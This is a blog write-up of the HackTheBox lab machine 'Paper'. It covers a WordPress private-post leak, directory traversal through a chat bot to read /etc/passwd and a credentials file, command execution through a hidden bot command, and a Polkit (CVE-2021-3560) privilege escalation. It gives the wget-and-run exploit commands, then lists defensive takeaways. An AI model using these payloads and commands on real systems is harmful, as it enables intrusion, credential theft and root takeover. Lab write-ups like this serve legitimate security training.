Close
Menu

Paper – HackTheBox Writeup

, , , , , , , , , , , , , 0

Paper

Machine Name: Paper
IP: 10.10.11.143
Difficulty: Easy

Summary

Paper is a relatively easy box and teaches enumeration and a bit of reading API documentations. It forces the attacker to keep looking for sensitive information that can be utilized to run commands and eventually get a shell. To get a user shell, we find credentials on the system through a chat bot. They can be used for logging in through SSH. Another way was to find a command hidden from the ones listed by the bot by reading the API documentation or finding a scripts directory to run commands as user and get a shell. Escalating privileges as root was simple as it was vulnerable to a popular vulnerability with a simple PoC.

Information Gathering

First step like always is to perform an Nmap scan.

SSH is open, Apache server is running on port 80, and SSL is enabled for the same Apache server.

The webserver at http://10.10.11.143/ shows a test page for Apache. Nothing interesting in the source code either. Then, I ran gobuster to find interesting directories.

Gobuster’s was not interesting either. I had already added paper.htb in my hosts file. I tried to get the header using curl and I found something interesting.

“office.paper” is the backend server. Let’s add that to the hosts file.

10.10.11.143    paper.htb
10.10.11.143    office.paper

The website is a wordpress blog. I checked the posts’ content and I found an interesting comment on the “Feeling Alone!” post.

Checking the source, it was observed that the website is running WordPress 5.2.3. This can also be found out by using the Wappalyzer browser extension.

Let’s use searchsploit to check if there are any existing vulnerabilities for this version.

“Viewing Unauthenticated/Password/Private Posts” seems interesting. Especially, after I found this comment on the “Feeling Alone” post.

Looking at the PoC for the vulnerability, it is understood that one can easily view private posts by appending “?/static=1” to the URL.

Visting “http://office.paper/?static=1”, we are presented with a page containing information about a new Employee chat system.

Exploring this “http://chat.office.paper/register/8qozr226AhkCHZdyY” link further after adding chat.office.paper to hosts, we land on a registration page. After registration, we see a #general channel where I see a bot named “recycleops” that has a message on it’s use.

We can can list and fetch files. I DM’d the bot and tried “list” as a command.

I first tried a directory traversal (LFI) by doing a “../../../../../etc/passwd” to find users.

We see that the user is dwight.

Getting Low Privilege Shell

Then, it took me a lot of searching and listing files and checking to finally land on this file “../hubot/.env” to find some sensitive information.

We got credentials! Let’s try using them on the open SSH port.

We successfully login and capture the user flag.

I tried capturing the flag with the bot but an “access denied” message was sent back.

I even tried doing some command injection but it didn’t work.

I was wondering if there was a way to run commands through the bot. I looked at the rocket chat API site and found that there was indeed a way to run commands.

Let’s have a look at scripts directory.

We can understand that all the commands listed by the bot are written in those javascript files. Interestingly, the “run.js” file seems to be missing from the commands listed by the bot. Let’s peep in!

We can indeed run commands through this. Let’s get a shell!

If we weren’t able to gain SSH access using the credentials and this was the only way, then we’d proceed to gain persistence by adding our public key to authorized_keys file on the victim.

That was fun sneaking around and finding some sensitive and interesting information and using that to gain a low privileged shell. Let’s move on to escalating our privileges to root…

Privilege Escalation

Running linpeas, we see that the script suggests Pwnkit exploit.

I simply downloaded the PoC script from secnigma’s github (Creator of this machine) to my attacker machine and then transferred it to the victim and ran the script. It took me a few attempts for the script to work. Sometimes it does not authenticate even if the user is created. It finally worked and I got root!

wget https://raw.githubusercontent.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation/main/poc.sh
python -m http.server
cd /tmp
wget http://10.10.16.22:8000/poc.sh
vi poc.sh   #Change the username and password or use default.
chmod +x poc.sh
./poc.sh
su - sid
sudo bash

Pwned!

Takeaways from this box would be:

  • Update applications running on production. In this case, website was running an older and vulnerable version.
  • Disable any way to “run” commands. Hiding features won’t suffice.
  • Do not reuse passwords.
  • Always update OS. In this case, the linux system was vulnerable to PolKit.

Thoviti Siddharth

I'm passionate about cybersecurity, machine learning, machine vision, web development. ​Welcome to my website! I write about my computer science experiments and thoughts that drive me to write.

→ Thoviti Siddharth

Related Posts

Leave a Reply

Your email address will not be published. Required fields are marked *